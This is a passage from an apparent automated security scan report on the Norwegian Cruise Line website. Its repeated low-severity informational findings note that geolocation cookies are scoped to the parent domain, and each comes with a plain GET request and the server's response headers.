Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317645008-1"
Cache-Control: public, max-age=0
Last-Modified: Mon, 03 Oct 2011 12:30:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Content-Length: 45949
Date: Mon, 03 Oct 2011 12:46:50 GMT
Connection: close
Set-Cookie: Cookie=R4252675302; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 12:46:50 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 12:46:50 GMT; path=/; domain=ncl.com

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.22. http://www2.ncl.com/about/careers/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /about/careers/overview

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/careers/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: HIT
ETag: "1317630853-1"
Last-Modified: Mon, 03 Oct 2011 08:34:13 +0000
X-Ncl-SLog: 10.5.44.29
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:34 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:34 GMT; path=/; domain=ncl.com
Content-Length: 41424

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.23. http://www2.ncl.com/about/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /about/contact-us

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/contact-us HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: HIT
ETag: "1317631645-1"
Last-Modified: Mon, 03 Oct 2011 08:47:25 +0000
X-Ncl-SLog: 10.5.44.30
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:32 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:32 GMT; path=/; domain=ncl.com
Content-Length: 67525

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.24. http://www2.ncl.com/about/environmental-commitment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /about/environmental-commitment

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/environmental-commitment HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 10:33:33 +0000
ETag: "1317638013-1"
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:34 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:34 GMT; path=/; domain=ncl.com
Content-Length: 47797

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.25. http://www2.ncl.com/about/staying-connected-sea-internet-access  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /about/staying-connected-sea-internet-access

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/staying-connected-sea-internet-access HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 13:03:50 +0000
ETag: "1317647030-1"
X-Ncl-SLog: 10.5.44.32
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:37 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:37 GMT; path=/; domain=ncl.com
Content-Length: 50010

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.26. http://www2.ncl.com/cruise-destinations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /cruise-destinations

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cruise-destinations HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ncl.com/nclweb/cbooking/submitPricingQualifiers.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; Cookie=R4252675302; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; s_pers=%20s_nr%3D1317646123362-New%7C1320238123362%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packa%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fcbooking%2525252FsubmitCruiseDetailsForm.html%2525253FpackageId%2525253D1912713%25252526itineraryCode%2525253D1581%252526ot%25253DA%3B; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.6.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_nr=1317646297776; s_sq=nclcom%3D%2526pid%253Dcbooking%25253A%252520bookingfunnel%25253A%252520cbooking%25253A%252520get%252520started%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww2.ncl.com%25252Fcruise-destinations%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 10:54:49 +0000
ETag: "1317639289-1"
X-Ncl-SLog: 10.5.44.28
Content-Type: text/html; charset=utf-8
Content-Length: 60847
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 12:51:16 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 12:51:16 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 12:51:16 GMT; path=/; domain=ncl.com

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.27. http://www2.ncl.com/destination/canada_new_engl/hotel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/canada_new_engl/hotel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/canada_new_engl/hotel HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/canada_new_engl/hotel
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:06:53 GMT
Content-Length: 268
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:06:53 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:53 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:53 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.28. http://www2.ncl.com/destination/canada_new_engl/ports/map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/canada_new_engl/ports/map

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/canada_new_engl/ports/map HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/canada_new_engl/ports/map
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:06:47 GMT
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:06:47 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:47 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:47 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.29. http://www2.ncl.com/destination/canada_new_engl/questions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/canada_new_engl/questions

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/canada_new_engl/questions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/canada_new_engl/questions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:06:59 GMT
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:06:59 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:59 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:59 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.30. http://www2.ncl.com/destination/canada_new_engl/stories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/canada_new_engl/stories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/canada_new_engl/stories HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/canada_new_engl/stories
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:06:54 GMT
Content-Length: 270
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:06:54 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:54 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:54 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.31. http://www2.ncl.com/destination/canada_new_engl/vacations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/canada_new_engl/vacations

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/canada_new_engl/vacations HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/canada_new_engl/vacations
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:06:58 GMT
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:06:58 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:58 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:58 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.32. http://www2.ncl.com/destination/caribbean/excursions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/caribbean/excursions

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/caribbean/excursions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/caribbean/excursions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:06:57 GMT
Content-Length: 267
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:06:57 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:57 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:57 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.33. http://www2.ncl.com/destination/caribbean/hotel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/caribbean/hotel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/caribbean/hotel HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/caribbean/hotel
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:06:59 GMT
Content-Length: 262
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:06:59 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:59 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:59 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.34. http://www2.ncl.com/destination/caribbean/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/caribbean/overview

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/caribbean/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/caribbean/overview
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:06:58 GMT
Content-Length: 265
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:06:58 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:58 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:58 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.35. http://www2.ncl.com/destination/caribbean/ports/map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/caribbean/ports/map

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/caribbean/ports/map HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/caribbean/ports/map
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:06:59 GMT
Content-Length: 266
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:00 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:00 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:00 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.36. http://www2.ncl.com/destination/caribbean/questions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/caribbean/questions

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/caribbean/questions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/caribbean/questions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:01 GMT
Content-Length: 266
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:01 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:01 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:01 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.37. http://www2.ncl.com/destination/caribbean/stories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/caribbean/stories

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/caribbean/stories HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/caribbean/stories
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:01 GMT
Content-Length: 264
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:01 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:01 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:01 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.38. http://www2.ncl.com/destination/caribbean/vacations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/caribbean/vacations

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/caribbean/vacations HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/caribbean/vacations
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:01 GMT
Content-Length: 266
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:02 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:02 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:02 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.39. http://www2.ncl.com/destination/europe/excursions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/europe/excursions

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/europe/excursions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/europe/excursions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:02 GMT
Content-Length: 264
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:02 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:02 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:02 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
11.40. http://www2.ncl.com/destination/europe/hotel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/europe/hotel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /destination/europe/hotel HTTP/1.1
